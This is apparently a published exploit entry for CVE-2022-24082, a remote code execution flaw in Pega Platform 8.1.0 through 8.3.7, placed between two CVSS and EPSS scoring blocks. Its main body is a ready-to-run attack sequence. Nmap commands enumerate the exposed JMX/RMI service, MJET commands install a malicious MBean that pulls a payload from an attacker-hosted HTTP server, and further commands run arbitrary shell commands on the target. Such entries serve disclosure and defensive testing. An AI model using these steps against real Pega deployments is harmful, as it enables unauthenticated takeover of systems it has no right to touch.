9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.016 Low
EPSS
Percentile
87.3%
# Exploit Title: Pega Platform 8.1.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 20 Oct 2022
# Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit)
# Vendor Homepage: www.pega.com
# Software Link: Not Available
# Version: 8.1.0 on-premise and higher, up to 8.3.7
# Tested on: Red Hat Enterprise 7
# CVE : CVE-2022-24082
;Dumping RMI registry:
nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address>
;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1
:<PORT>)
;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI
dump, but actually listens on the network as well):
nmap -sT -sV -p <PORT> <IP Address>
;Exploitation requires:
;- JVM
;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet)
;- jython
;Installing mbean for remote code execution
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
Address> 9999 install random_password http://<Local IP to Serve Payload
over HTTP>:6666 6666
;Execution of commands id & ifconfig
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
Address> 9999 command random_password "id;ifconfig"
;More details:
https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316
Kind Regards,
Marcin Wolak
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.016 Low
EPSS
Percentile
87.3%